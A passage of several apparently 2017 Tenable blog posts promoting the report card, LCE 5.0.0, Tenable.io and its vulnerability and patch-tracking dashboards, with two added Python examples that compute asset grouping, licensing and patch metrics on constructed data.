    Committing to this approach means pairing different leaders, or “change agents,” within the organization who assume leading roles during different stages, with the establishment and execution of cybersecurity processes, procedures and technologies. It also requires that leaders understand that the strategies their organization uses depend on its stage of change, and on whether the social environment surrounding cybersecurity is supportive or obstructive.

    Bridging the gap between security teams and business leaders

    The result of properly committing to this approach can change an organization from a philosophy of cybersecurity being something companies begrudgingly do, to cybersecurity becoming part of the culture. This marriage of practices can also move IT security groups out of a relaxed, ad-hoc or subservient role and into a centralized and universal function, much like marketing, human resources, operations or finance is today. This approach can also be valuable in positioning CISOs with the opportunity to report directly to the CEO, as opposed to a CISO reporting to one of the CTOs, who in turn reports to a CIO under the COO.

    Cybersecurity must become part of the culture

    Finally, with this shift in understanding, organizations can move from elementary, disparate or poorly implemented technologies to an enterprise IT security technology architecture capable of producing actionable intelligence, real-time analysis, predictive modeling and stronger cybersecurity confidence. Any organization that does this will find their confidence rising well above C level in the next Tenable Network Security Global Cybersecurity Assurance Report Card, and have the skills to back up their newfound confidence.

    Boosting Confidence in Governments’ Cybersecurity


    The growing complexity of IT enterprises and the cyberthreats facing them are eroding governments’ confidence in their ability to assess and mitigate cybersecurity risk, according to the latest Global Cybersecurity Assurance Report Card. The overall score for governments across nine countries dropped three percentage points from 2016, to 63 percent, putting government last among the seven sectors surveyed. The key to boosting confidence is the ability to see infrastructure and monitor activity.


    The annual report card, created by Tenable with research partner CyberEdge Group, does not measure actual security status. It assesses the confidence of information security professionals in their ability to protect their organizations. So a low score does not necessarily mean poor security. But it does show that government security professionals are acutely aware of the growing challenges they face.

    Surprisingly, money shortages rank low on the list of security concerns. The real hurdles are taming the complexity of the environment and gaining visibility into the network.

    The nuts and bolts

    The report card is based on online surveys of 700 IT security professionals from 19 business sectors and governments in nine countries. The United States accounted for about 39 percent of respondents. Government accounted for a little more than five percent of those surveyed.

    The study assesses confidence in two broad areas: risk assessment, an organization’s ability to assess risks within the enterprise, and security assurance, its ability to mitigate threats based on executive and board-level commitment. Overall confidence in Security Assurance dropped from 70 percent in 2016 to 67 percent, and the Risk Assessment score dropped from 63 percent to 59 percent. Scores were down in just about every category for every sector.

    The reason is the increasing complexity and decentralization of the IT environment and the complexity of the threats facing it. “The days of a well-defined network perimeter that can be secured and defended are long over,” the study concludes, and traditional security tools no longer are sufficient.

    Governments’ strengths and weaknesses

    Governments showed the lowest level of confidence in their cybersecurity among the sectors measured. But the results showed strengths as well as weaknesses.

    Strengths

    1. Measuring security effectiveness (B-)
    2. Viewing network risks continuously (C+)
    3. Conveying risks to executives and board members (C-)

    Weaknesses

    1. Aggregating risk intelligence (F)
    2. Assessing cloud environments (F)
    3. Assessing DevOps environments (F)

    What’s the problem?


    When respondents were asked to rate the challenges they face, lack of budget came out near the bottom of the list. The number one challenge is the “overwhelming cyber threat environment.” This was followed by security awareness among employees and a lack of network visibility caused by the proliferation of personal devices in the workplace and shadow IT.

    I am more familiar with the U.S. government than other governments around the world, but I suspect that the cybersecurity challenges they face are similar. It is not so much a lack of money hindering government security (although that is always a problem) as it is a cumbersome budget process that slows IT refresh cycles, swells legacy infrastructure, and delays acquisition of security technology and manpower.

    The result is a lack of visibility into the infrastructure and an inability to monitor activity, which makes it difficult to understand and secure the IT environment.

    Boosting confidence

    Despite problems, there are signs of improvement. The U.S. government is moving away from prescriptive, process-based security toward results-oriented programs. This is reflected in the shift from periodic assessment of static controls to a focus on continuous monitoring and risk management, as illustrated by the Continuous Diagnostics and Mitigation program.

    This program provides the tools to tame the IT environment by creating visibility into agency networks, allowing them to discover resources and monitor, analyze and understand activity. Risks can then be identified, prioritized and mitigated. The ability to see, understand and control the network should give cybersecurity professionals greater confidence in their ability to do their jobs.

    More information

    You can get the detailed results of the survey in the full 2017 Global Cybersecurity Assurance Report Card, and compare it with results from the 2016 report card. Or listen to an on-demand webinar from Tenable.

    Tenable Delivers LCE 5.0.0

    Tenable is pleased to announce a major update to the Log Correlation Engine® (LCE®), making it easier to scale horizontally to meet growing organizational demands on performance and redundancy. Additionally, LCE 5.0.0 greatly expands language support for log data. This release will be available on January 30th, 2017.

    Scalability and language support with Elasticsearch integration

    The biggest update to the Log Correlation Engine in version 5.0.0 is the replacement of our proprietary database format with Elasticsearch. Elasticsearch is a document-store database that wraps Apache Lucene, providing horizontal scaling, built-in indexing, a REST API, and a comprehensive query language. Users unfamiliar with Elasticsearch need not worry - LCE handles setup, schema, and disk usage. Users familiar with Elasticsearch will immediately see the benefits:

    • Horizontal scalability for additional performance and redundancy
    • Integration with other Elasticsearch utilities such as Kibana for faster or more familiar log search, visualizations, and dashboards
    • Language support for Chinese, Japanese, Korean and other characters for storage, index, and query of log data

    Kibana screen shot

    LCE language support screen shot

    Custom actions and real-time alerting with the Event Rule Editor

    The Event Rules are one of the most powerful features in LCE, giving users the ability to take action and trigger alerts in real time. LCE 5.0.0 now makes the Event Rules much easier to create and maintain. The new editor in the UI guides users through all of the possible filters and actions available.

    Creating an event rule

    Enhanced language support with Windows Agent 5.0.0

    Tenable will also introduce the LCE 5.0.0 Windows Agent, to coincide with the LCE 5.0.0 Server. The new agent adds the ability to monitor text files and NT event logs with Unicode log data, allowing users to send non-English logs from the LCE agent to the LCE server intact.

    This update also greatly eases installation and configuration overhead for administrators by removing some installation requirements and adding full support for DHCP.

    For users who need to pare down the data they send from the agent to the server, we’ve also added native NT event log filtering; just specify the event source and event ID to ignore in the agent policy, and you’ll save network bandwidth and CPU while reducing unnecessary log data in the LCE Server.

    Improved agent policy management

    Policy management gets faster and easier with LCE 5.0.0. Power users who create their own custom policies can now quickly see only those custom policies with the Hide Default button.

    Some aesthetic updates were also made to the Policy screen - all of the actions are now exposed by clicking the Modify icon to the right of the policy name. The layout was also modified to ensure constant height rows for easier readability.

    Policy Management in LCE

    Downloading LCE

    You can download LCE 5.0.0 and the LCE Windows Agent 5.0.0 from the Tenable Support Portal on January 30, 2017.

    Elasticsearch is a trademark of Elasticsearch BV.
    Apache and Apache Lucene are trademarks of the Apache Software Foundation.

    Transforming Vulnerability Management: Introducing Tenable.io

    The vulnerability management industry is at a crossroads: solve long-standing problems and equip security teams for the future, or become obsolete.

    As more organizations adopt cloud, mobile, and DevOps as core business enablers, the fundamental concept of an asset changes. This radically impacts how security teams interact with their peers and do their jobs. Even the ownership of assets changes with the rise of DevOps, as security teams must now work with developers, not just IT and network administrators. New thinking is required to deliver a modern approach to vulnerability management (VM) that solves these challenges without penalizing customers for using new technologies like cloud and containers.

    Introducing Tenable.io

    Tenable has embraced the challenge of transforming vulnerability management. Today we are proud to introduce Tenable.io™, the first vulnerability management platform built for today’s dynamic assets. Using our renowned Nessus® technology, Tenable.io delivers a fresh, asset-based approach that accurately tracks resources and prioritizes vulnerabilities, while accommodating dynamic assets like cloud and containers.

    The Tenable.io platform includes state-of-the-art applications for specific business needs, supported by horizontal capabilities like data collection and integration. These applications include not only Tenable.io Vulnerability Management, but also two new products that we are excited to announce: Tenable.io Container Security and Tenable.io Web Application Scanning.

    Tenable.io diagram

    Reorienting VM around a true view of assets

    With the rise of transient and short-lived assets – laptops, mobile devices, cloud instances and now containers – Tenable has redefined vulnerability management around true asset identities, rather than IP addresses. This approach permeates the entire Tenable.io experience – from how it tracks vulnerabilities to how you license the product.

    We addressed the asset challenge through an advanced asset fingerprinting algorithm. Think of it as facial recognition software for IT – no matter where assets come from and go to, Tenable.io sees their true identity. This allows security teams to have a fact-based dialogue with their peers in IT, networking and development about the organization’s overall security posture and what to remediate.

    Tenable.io UI - asset overview
    Assets are accurately tracked with an advanced asset fingerprinting algorithm, even when they have multiple IP addresses

    Customer-friendly licensing

    Given these shifts in how organizations are managing assets and vulnerabilities, conventional licensing approaches are ill-suited to the modern environment. In their place, we are pleased to introduce Elastic Asset Licensing.

    This industry-first model enables you to accurately license all your assets. Each asset consumes just a single license unit, even those with multiple IP addresses like laptops, mobile devices and cloud instances. This elastic model also allows product usage to continue when license counts are temporarily exceeded, and automatically recovers licenses for rarely scanned assets or one-time bursts. If you’ve ever had to “hoard” IP addresses with another VM solution, your frustration is over.

    Moreover, we don’t nickel-and-dime customers the way some cloud VM vendors do. You pay only for the business applications you use and nothing more. All of the rich platform capabilities are included at no extra cost – including our popular Nessus sensors. You receive full and unfettered use of an unlimited number of internal and external scanners, agents and other data collection components.

    Expanding vulnerability management to containers

    Tenable.io Container Security, based on our recent acquisition of FlawCheck, continuously assesses container images for vulnerabilities, malware and enterprise policy compliance. By bringing security into the container build process up-front through integration with CI/CD systems (continuous integration/continuous deployment), you can gain visibility into the hidden risks in containers and remediate them before they reach production – all without slowing innovation cycles. We are now conducting early customer engagements with Tenable.io Container Security and plan to release it in April.

    Container Security dashboard
    Tenable.io Container Security monitors container images for vulnerabilities, malware and policy compliance

    Web application security for your custom apps

    We are also delighted to introduce Tenable.io Web Application Scanning. This offering provides comprehensive vulnerability scanning for modern web applications. Its accurate vulnerability coverage minimizes false positives and negatives, ensuring security teams understand the true risks in their web applications. And it does so in an automated and affordable way so you can cover all of your web apps. A customer beta program begins in March; if you’d like to participate, please contact us.

    Openness and integration

    It’s more critical than ever to have one place for all vulnerability data, no matter where it comes from. Solutions that only accept and manage their own data are doing a disservice to customers who need complete visibility.

    That’s why Tenable.io includes pre-built integrations with complementary systems like password vault, patch management and mobile device management (MDM) solutions. We are partnering with a wide range of vendors, many of whom are highlighted on our Works with Tenable.io page. Tenable.io also offers a well-documented API and easy to use software development kit (SDK), to enable additional integrations that help your security program leverage the full value of vulnerability data.

    Looking ahead: the TVM journey

    The introduction of Tenable.io is a major step on the journey toward answering some of the toughest questions in security: How secure am I? Is my security posture improving? What are the vulnerabilities and threats I should focus on?

    Addressing them requires moving beyond conventional VM to provide deeper context and insight – by capturing more types of data (on assets, vulnerabilities and threats) from more vendors (including other VM vendors) in more ways (including pre-deployment and in production). This is exactly what Tenable.io is designed to do.

    Gartner predicts that a new market called Threat and Vulnerability Management (TVM) – part of a broader market of Security Operations, Analytics and Reporting (SOAR) solutions – will develop to meet these needs. Gartner notes that TVM will deliver improved vulnerability management via both enhanced workflow and better prioritization through the use of threat intelligence and business context.

    Our vision for the future of VM will deliver on TVM and more. This is an ambitious goal, and one Tenable is uniquely positioned to achieve.

    More information

    We invite you to join us on the journey. To experience Tenable.io today, please register to try the product, or join us for a product introduction webcast on February 28 in the Americas, with subsequent dates in other regions.

    You can also learn more in our Tenable.io Frequently Asked Questions, covering Nessus Cloud, SecurityCenter®, pricing/licensing and more.

    Nessus Cloud is Now a Part of Tenable.io Vulnerability Management

    This week, Tenable made an exciting announcement about Tenable.io™, our new, modern vulnerability management platform built for today’s elastic assets. The Tenable.io platform will include state-of-the-art applications for specific business needs, the first of which is Tenable.io Vulnerability Management. In the near future, we’ll release additional applications for container security, web application scanning, and more.

    For Nessus® Cloud customers, this first application is important because Nessus Cloud has evolved into Tenable.io Vulnerability Management.

    Tenable.io Vulnerability Management will be familiar to anyone who has used or seen Nessus Cloud in the past. All the capabilities that were in Nessus Cloud are now a part of Tenable.io Vulnerability Management, including:

    • Running vulnerability assessments for software flaws, configuration issues and malware detection using Nessus scanners and/or agents to reduce your attack surface
    • Sharing scan resources, such as scanners, policies, and results for more efficient use of Tenable.io Vulnerability Management
    • Integrating with complementary solutions like credential management, mobile device management, and patch management systems

    Along with the previous Nessus Cloud features, Tenable.io Vulnerability Management also offers new capabilities that will help security professionals solve some of the very tough vulnerability management challenges that come up in today’s dynamic IT environments.

    Asset tracking delivers reliable results

    Historically, vulnerability management solutions have tracked vulnerabilities by IP address. In recent years, IP-based vulnerability tracking has become more of a problem because many assets today have multiple IP addresses, and for elastic assets like cloud instances the IP address is often irrelevant. In situations like these, traditional vulnerability management solutions that rely solely on IP addresses will simply provide inaccurate results.

    Tenable.io Vulnerability Management offers a highly accurate way to track assets and vulnerabilities on those assets. It employs an advanced asset identification algorithm that uses an extensive set of attributes such as Tenable ID, NetBIOS name, MAC address, and many others to accurately track assets, changes to assets, and vulnerabilities on those assets.

    Asset tracking enables Tenable.io to deliver the most accurate count and state information about vulnerabilities. There’s no duplicate counting of vulnerabilities on assets that have multiple IP addresses or mis-counting on assets that can have short-lived IP addresses like cloud instances. With this greater visibility and insight, security professionals are armed to make better decisions about where to focus resources and priorities to best protect their environments.

    Customer friendly elastic asset licensing

    Building on the foundation of asset tracking, Tenable.io Vulnerability Management customers also benefit from elastic asset licensing – the industry’s only licensing approach based on assets instead of IP addresses. Other vulnerability management solutions today follow rigid IP-based licensing, and for most organizations this results in increased cost, as IP counts can be challenging to gather accurately. Tenable.io follows a flexible and customer-friendly elastic asset licensing model, enabling users to monitor and adjust license consumption and then true-up when necessary, while continuing to use the product. Tenable.io automatically reclaims licenses from assets not scanned for 90 days – without deleting the data.
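    The post describes asset identification and elastic licensing only in outline. The following is an added Python example, written for this page and not Tenable’s own algorithm, that shows the principle behind both paragraphs: scan records are clustered into assets by identity attributes of the kinds named above (Tenable ID, MAC address, NetBIOS name) and never by IP, so a laptop seen on two IPs is counted once while two cloud instances that reused one IP stay separate; the 90-day reclaim rule from the licensing paragraph is then applied to the resulting assets. The three attributes, the union-find matching rule, the constructed records and the placeholder plugin IDs (only 96390 appears in this post) are assumptions.

```python
from datetime import date

# Constructed scan observations (made-up values, not Tenable.io data).
# Identity attributes of the kinds the post names (Tenable ID, NetBIOS name,
# MAC address) are used; the IP is recorded but never used as an identity.
# Plugin 96390 is from the post; the 9xxxxx IDs are placeholders.
SCAN_RECORDS = [
    # One laptop seen on two networks: two IPs, same MAC and NetBIOS name.
    {"ip": "10.0.1.15", "mac": "00:11:22:33:44:55", "netbios": "LAPTOP-A",
     "tenable_id": None, "seen": "2017-01-10", "plugins": {96390, 900001}},
    {"ip": "10.0.2.77", "mac": "00:11:22:33:44:55", "netbios": "LAPTOP-A",
     "tenable_id": None, "seen": "2017-02-01", "plugins": {96390, 900001}},
    # Cloud instance A (since terminated) and instance B, which reused A's IP.
    {"ip": "172.16.5.9", "mac": None, "netbios": None,
     "tenable_id": "agent-aaaa", "seen": "2016-10-01", "plugins": {900002}},
    {"ip": "172.16.5.9", "mac": None, "netbios": None,
     "tenable_id": "agent-bbbb", "seen": "2017-02-05", "plugins": {900003}},
]

IDENTITY_KEYS = ("tenable_id", "mac", "netbios")  # assumed subset of the real attribute set
RECLAIM_DAYS = 90  # from the post: licenses are reclaimed from assets not scanned for 90 days


def group_assets(records):
    """Cluster records into assets: any shared identity attribute joins two records (union-find)."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    first_seen_with = {}
    for idx, rec in enumerate(records):
        for key in IDENTITY_KEYS:
            value = rec.get(key)
            if value is None:
                continue
            if (key, value) in first_seen_with:
                parent[find(idx)] = find(first_seen_with[(key, value)])
            else:
                first_seen_with[(key, value)] = idx
    groups = {}
    for idx, rec in enumerate(records):
        groups.setdefault(find(idx), []).append(rec)
    return list(groups.values())


def vuln_totals(records):
    """Vulnerability instances counted by IP (the traditional way) and by asset."""
    by_ip = {}
    for rec in records:
        by_ip.setdefault(rec["ip"], set()).update(rec["plugins"])
    by_asset = [set().union(*(r["plugins"] for r in g)) for g in group_assets(records)]
    return {"by_ip": sum(len(p) for p in by_ip.values()),
            "by_asset": sum(len(p) for p in by_asset)}


def licensed_asset_count(records, today_iso):
    """Assets consuming a license unit: those scanned within the last RECLAIM_DAYS days."""
    today = date.fromisoformat(today_iso)
    licensed = 0
    for group in group_assets(records):
        last_seen = max(date.fromisoformat(r["seen"]) for r in group)
        if (today - last_seen).days <= RECLAIM_DAYS:
            licensed += 1
    return licensed


if __name__ == "__main__":
    for asset in group_assets(SCAN_RECORDS):
        ips = sorted({r["ip"] for r in asset})
        vulns = set().union(*(r["plugins"] for r in asset))
        print(f"asset seen at {ips}: {len(vulns)} vulnerabilities")
    print(vuln_totals(SCAN_RECORDS))                         # by_ip 6 vs by_asset 4
    print(licensed_asset_count(SCAN_RECORDS, "2017-02-10"))  # 2: instance A reclaimed
```

    Counting by IP reports six vulnerability instances on three "hosts" because the laptop's two findings are counted on each of its addresses and the two instances collapse into one address; counting by asset reports four instances on three assets, and only the two assets seen in the last 90 days consume a license.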

    Dashboards and reports

    To make it easier for security professionals to get insight into vulnerability data, there are a number of new dashboards and reports in Tenable.io Vulnerability Management. For example, there’s a new dashboard that specifically identifies those vulnerabilities that are exploitable by malware, which for many organizations will sit higher on the remediation list than others. The example below shows a dashboard that highlights patching status, which can be helpful for organizations that have goals like “fix all high priority vulnerabilities within 30 days.”


    Tenable.io VM Outstanding Patch Tracking All Assets Dashboard

    Next steps

    This initial introduction of Tenable.io and Tenable.io Vulnerability Management is just the start. I look forward to sharing more new capabilities throughout 2017 and beyond.

    If you have been using Nessus Cloud, the evolution to Tenable.io Vulnerability Management is seamless and requires no action on your part. When you log in, you’ll see the new name, and more importantly, new capabilities available to you.

    If you’re new to Tenable.io Vulnerability Management, we’d love to have you learn more or take the application for a test drive. Here are a few resources that will help get you started:


    Outstanding Patch Tracking Dashboard

    The IT Operations teams in most organizations run in monthly cycles from “Patch Tuesday” to “Patch Tuesday.” The cycle never seems to end, and in many cases the vulnerabilities from one cycle bleed into the next, so this insurmountable problem seems to grow at an exponential rate. This continuous cycle often leads operational managers to difficult choices and, in some cases, uncomfortable meetings where they try to explain the presence of vulnerabilities. The Vulnerability Management (VM) application in Tenable.io enables operations managers to easily see how progress is made toward patch deployment goals.

    Outstanding patch statistics

    When reporting to management about the status of patch deployments, you always benefit from being able to quantify the current status in easily explainable terms. The Outstanding Patch Tracking dashboard provides easy-to-understand metrics that can be communicated to anyone in the organization. The top two components use the Patch Report plugin (66334) to show how many systems are missing patches, by patch count and by operating system. Reviewing the series by patch count gives you an overall understanding of how effective patch management is: if systems are missing more than 90 patches, your organization is not applying patches effectively, whereas if all systems with missing patches fall in the 0 - 30 range, you are within a 30 patch cycle. The adjacent bar chart lists the hosts per operating system that have been reviewed for missing patches. Because the Patch Report plugin only triggers on a credentialed scan, this chart also indicates whether all your systems are being scanned with valid credentials.

    Outstanding Patch Tracking dashboard: plugin 66334 Patch Report Data

    Microsoft Security Bulletins

    After gaining a good understanding of the metrics, you must be able to communicate the risk and how exposed systems are because of the outstanding patches. The Tracking Microsoft Security Bulletins - Current Missing Patches component displays the total count of missing patches related to Microsoft Security Bulletins. The security bulletins are named by the year and the order in which a bulletin was released. For example, MS17-001 was Microsoft’s first security bulletin released in 2017 (Plugin ID: 96390, Plugin Name: MS17-001: Security Update for Microsoft Edge). This naming makes the effectiveness of your patch management program visible: by combining several Microsoft Bulletin prefixes together, you can easily track the year in which each vulnerability was patched. An effective patch management system will not have missing patches from years prior to the current year.

    Outstanding Patch Tracking dashboard: Tracking Microsoft Security Bulletins

    This matrix includes six columns: the first provides a count of affected systems, the middle four provide counts for the respective severity levels, and the final column provides a count of the vulnerabilities which are exploitable. The color of this final column changes with the exploitable percentage: >=90 Red, >=75 Orange, >=50 Yellow, >=25 Green, >=1 Blue, and Blue by default. The closer the color is to red, the greater the risk.
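    To make the arithmetic behind the Patch Report components and the Microsoft Security Bulletins matrix concrete, here is an added Python example, written for this page rather than taken from Tenable.io or its dashboard code, that recomputes the missing-patch buckets, the count of missing bulletins per release year and the exploitable-percentage color from a constructed set of findings. The bucket boundaries other than the 0 - 30 and >90 ranges named above, the placeholder plugin IDs (only 96390 is from the post) and bulletin names, and the assumption that the percentage is taken over the missing-bulletin findings are mine, not the dashboard’s.

```python
import re
from collections import Counter

# Constructed sample data (not output from Tenable.io or plugin 66334).
# Number of missing patches the Patch Report plugin (66334) listed per host.
PATCH_REPORT = {"ws-01": 4, "ws-02": 27, "db-01": 58, "web-01": 0, "legacy-01": 113}

# Constructed findings: (host, plugin_id, plugin_name, severity, exploitable).
# 96390 / MS17-001 is the example from the post; the 9xxxxx IDs and the other
# bulletin names are placeholders, not real plugin IDs.
FINDINGS = [
    ("ws-01", 96390, "MS17-001: Security Update for Microsoft Edge", "Critical", False),
    ("ws-02", 96390, "MS17-001: Security Update for Microsoft Edge", "Critical", False),
    ("legacy-01", 900001, "MS16-120: constructed bulletin", "High", True),
    ("legacy-01", 900002, "MS15-034: constructed bulletin", "Critical", True),
    ("db-01", 900003, "MS16-032: constructed bulletin", "High", True),
    ("web-01", 900004, "Apache 2.4.x constructed finding", "Medium", False),
]

# Assumed bucket ranges; the post names only the 0-30 and >90 ranges.
BUCKETS = ((0, 30), (31, 60), (61, 90), (91, None))
SEVERITIES = ("Critical", "High", "Medium", "Low")
MS_BULLETIN = re.compile(r"\bMS(\d{2})-(\d{3})\b")


def missing_patch_buckets(patch_report):
    """Count hosts by how many patches the Patch Report plugin says are missing."""
    counts = Counter()
    for missing in patch_report.values():
        for lo, hi in BUCKETS:
            if missing >= lo and (hi is None or missing <= hi):
                counts[f"{lo}-{hi}" if hi is not None else f">{lo - 1}"] += 1
                break
    return dict(counts)


def bulletins_by_year(findings):
    """Count distinct missing Microsoft Security Bulletins per release year (MSyy-nnn)."""
    per_year = {}
    for _host, _pid, name, _sev, _expl in findings:
        m = MS_BULLETIN.match(name)
        if m:
            yy = int(m.group(1))
            year = 1900 + yy if yy >= 98 else 2000 + yy  # bulletins date back to MS98-xxx
            per_year.setdefault(year, set()).add(m.group(0))
    return {year: len(ids) for year, ids in per_year.items()}


def stale_bulletin_years(findings, current_year):
    """Years before current_year that still have missing bulletins: the programme is behind."""
    return sorted(y for y in bulletins_by_year(findings) if y < current_year)


def exploitable_colour(percent):
    """Colour thresholds from the Tracking Microsoft Security Bulletins component."""
    if percent >= 90:
        return "Red"
    if percent >= 75:
        return "Orange"
    if percent >= 50:
        return "Yellow"
    if percent >= 25:
        return "Green"
    return "Blue"  # >=1 and the default are both Blue


def bulletin_matrix_row(findings):
    """One row of the six-column matrix: affected systems, four severities, exploitable."""
    ms = [f for f in findings if MS_BULLETIN.match(f[2])]
    severity = Counter(f[3] for f in ms)
    exploitable = sum(1 for f in ms if f[4])
    pct = round(100 * exploitable / len(ms)) if ms else 0  # assumed: share of bulletin findings
    row = {"affected_systems": len({f[0] for f in ms})}
    row.update({s: severity.get(s, 0) for s in SEVERITIES})
    row.update({"exploitable": exploitable, "exploitable_pct": pct,
                "colour": exploitable_colour(pct)})
    return row


if __name__ == "__main__":
    print("hosts by missing-patch count:", missing_patch_buckets(PATCH_REPORT))
    print("missing bulletins by year:", bulletins_by_year(FINDINGS))
    print("years behind:", stale_bulletin_years(FINDINGS, 2017))
    print("matrix row:", bulletin_matrix_row(FINDINGS))
```

    With the constructed data, legacy-01 lands in the >90 bucket, bulletins from 2015 and 2016 are still missing in 2017, and three of the five missing-bulletin findings are exploitable, so the exploitable column would be shown in yellow.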

    Missing patches by plugin family

    While reporting on Microsoft vulnerabilities is good, there are other operating systems you should be concerned with. The Remediations Tracking - Current Missing Patches component tracks vulnerabilities based on plugin families. Tenable.io is capable of analyzing many types of software and hardware. As a result, there are many plugin families covering different types of software and hardware grouped by a common theme, such as Debian Local Security Checks. There are currently over 60 plugin families supported by Tenable.io. The plugins within each family detect and evaluate information based on different criteria for each operating system. For example, for vulnerabilities found in Apache, there could be several plugins across many plugin families. Taking this approach helps you easily communicate the risk exposure by operating systems other than Microsoft.

    Outstanding Patch Tracking dashboard: tracking vulnerabilities by plugin families

    This matrix uses a similar approach to the previous matrix: the first column provides a count of affected systems, the middle four columns provide counts for the respective severity levels, and the last column shows exploitable percentages. However, in this matrix, the exploitable percentage remains purple regardless of the percentage value.

    Outstanding patch analytics

    As a practitioner and manager, I use the data in the Outstanding Patch Tracking dashboard on a daily basis. Monitoring the different views helps to prepare for conversations with my team and management. When communicating with my team and IT operations, this information helps to communicate risk and where remediation efforts are most needed. Additionally, I can have open discussions about problems in the vulnerability collection process. For example, when reviewing the bar chart, I can talk with the operations team about operating systems that I know are present on the network, but seem to be missing from the dashboard; or we can discuss quantities of each of the operating systems as needed.

    Another interesting thing happened recently in a meeting with my team: the bar chart indicated that there were both “Windows 7 Professional” and “Windows 7 Professional N” systems. The “N” version of Windows 7 is a more international version of Windows, often found in countries that are part of the European Economic Area, Croatia, and Switzerland. The OS allows users to choose their own media player and the software required to manage and play CDs, DVDs, and other digital media files. From this conversation, we went on to a larger discussion about where these systems came from and whether they should be present within our environment.

    When discussing risk with the upper echelons of management and the security operations team, this dashboard provides me the current status of vulnerability data. With this information, I am able to speak about risk incurred from delaying patch deployments, and can provide insight on the exploitability if our organization were attacked. These numbers also provide foundational information needed to calculate projected costs per vulnerability if compromised. These types of analyses help executives understand the risk to the organization and may help to fund expensive mitigation strategies.

    Wrapping up

    As you work to address your risk mitigation tasks and track progress, the Tenable.io Outstanding Patch Tracking dashboard provides key analytics. Whether you are communicating up the chain, to peers, or to your team, this dashboard provides a thorough look at your outstanding risk.

    Interested in learning more about Tenable.io?

    2017: Time to Shake Up Your Understanding of Risk

    Two years ago, the message coming out of the RSA Conference was that the security industry had failed; new products kept emerging, yet breaches were still on the rise. Today, we still hear about daily security attacks. Organizations embrace new technologies to remain competitive, and security practitioners struggle to keep pace and preserve the enterprise from painful compromise. If you think the tech community hasn’t done a great job of understanding exposures and managing risk in traditional enterprise environments, things get a lot more complex with the rush to cloud, embracing the DevOps revolution, containers and other technologies that increase capabilities but that turn traditional infrastructure on its head. Simply put, enterprise technology risk is getting more difficult to assess and manage effectively.

    Cybersecurity in the spotlight in 2017

    As enterprise use of technology is rapidly evolving, security vendors must also evolve or become obsolete. The importance of cybersecurity is clear in every organization - not just to security professionals, but to CEOs, boards of directors, government agencies and customers. Security teams are starting to think about security more strategically. Senior executives couldn’t care less about the better mouse traps our industry is so fond of developing and marketing with great fanfare. The questions CISOs and senior executives want to know are quite foundational: “How exposed is our organization?” “How much risk are we facing?” and “How does that exposure and risk profile change as we make changes to our IT systems and business model?”

    At Tenable, we are transforming our products and company, looking at security solutions in a new light, and developing capabilities that empower our customers with the confidence they need to embrace their future. Vulnerability and risk management are going to look very different this year.

    Tenable’s strategy

    Tenable has always been the leader in vulnerability management; it’s in our DNA. Today’s enterprise exposes an attack surface that looks very different than how it looked a few years ago. From BYOD to virtual systems, web apps to containers, cloud to DevOps deployments, organizations struggle to achieve visibility, to understand their true exposure, and to determine how best to manage risk.

    With the unveiling of Tenable.io™, our new vulnerability management SaaS platform, a foundational building block to that future is here. Tenable.io is going to change the way you think about vulnerability management.

    Tenable.io helps you understand your vulnerabilities holistically, including enterprise computing environments, mobile systems, virtual machines, web sites, web applications, containers, IoT and control systems. The strategic approach to vulnerability management brings modular applications that address your business needs for Vulnerability Management, Container Security, and Web Application Scanning.

    Tenable.io enables you to leverage nearly unlimited usage of the renowned Nessus® scanners. It also includes agents, passive scanning and web app scanning technology to give you the greatest visibility into your environments. Tenable.io is the only solution to build container security into vulnerability management.

    Tenable.io is going to change the way you do vulnerability management

    We know that it can be frustrating to assess your risk based on IP addresses when your business actually aligns with assets. At the core of Tenable.io is an asset-based understanding of your exposures and risk, not one tied myopically to IP addresses. Licensing based on assets provides simple pricing, more transparent licensing, more accurate identification of resources and more concise reports. What is an asset? An asset is simply a resource that can be analyzed. It’s that easy. Elastic asset licensing is a better foundation for a complete and accurate view of your systems and risk. And Tenable.io is the only security solution that is licensed by assets.

    The Tenable.io API and SDK and the Tenable Technology Integration Partner Program also provide seamless integrations with other critical solutions in the IT environment.

    Tenable.io is going to change your understanding of risk and the way you do vulnerability management.

    Partners in the future

    It's an exciting time in our industry. Tenable has set ambitious goals to solve some of the most foundational security challenges and empower CISOs to gain control of their expanding environments. We will be bold and we will never stop innovating. We are proud to be your strategic partner in managing risk.

    The Buzz from RSA 2017

    So much happens at the RSA conferences that even if you are there, you can miss some of the important messages. Not to worry, we have you covered this year. Listen as Cris Thomas (aka Space Rogue) shares the buzz from RSA USA February 2017. From trends in the security industry to news items that have impacted infosec pros, it's all here for you.

    2017 Is a Transformative Year for Security

    For organizations around the globe, security is evolving from a technology issue to a business issue. CEOs, board members and risk managers are asking questions and seeking solutions from their CISOs. With technologies such as IoT, cloud services, industrial control systems and DevOps in the spotlight, 2017 will be a game changing year for security.

    Tenable.io, our new cloud-based vulnerability management platform, is positioned to help infosec pros transform their vulnerability management programs to better understand their exposure and gain control of risk.

    Listen as five Tenable experts discuss the coming challenges and opportunities in the security industry.

    Vulnerability Management Dashboard

    Along with traditional assets, dynamic assets such as mobile devices, containers, and cloud-based solutions are changing the way organizations deal with vulnerability management. To manage these effectively, you need a streamlined way to assess your organization’s existing security posture. The enhanced vulnerability management capabilities of Tenable.io™ provide a more effective way to manage assets and their vulnerabilities, and give insight into hidden security risks, enabling you to make better informed decisions to protect your organization.

    Managing vulnerabilities

    Presenting vulnerability metrics to managers and executives helps communicate the organization's current risk exposure. As more vulnerabilities continue to be discovered, attackers are constantly looking for new ways to exploit them and break into networks. Attackers often target exposed systems and attempt to exfiltrate confidential data. The result of such an intrusion could severely impact business operations. While vulnerabilities will always exist, Tenable.io helps to provide a clear strategy to assess and prioritize risks.

    The Vulnerability Management Dashboard provides a new way to accurately track assets, prioritize vulnerabilities, and monitor mitigation efforts. As organizations continue to grow, vulnerabilities can span across a variety of platforms within your environment. With all of these changes, administrators can easily lose track of which systems and applications are the highest priority.

    Vulnerability Management Dashboard

    Using the Top 100 Most Vulnerable Hosts component, you can easily detect systems with the most risk, along with vulnerable and outdated software. Once these systems are identified, you can better plan mitigation strategies such as updating software, hardening systems, or implementing other mitigation methods.

    Top 100 Most Vulnerable Hosts component

    Data Access Vulnerabilities

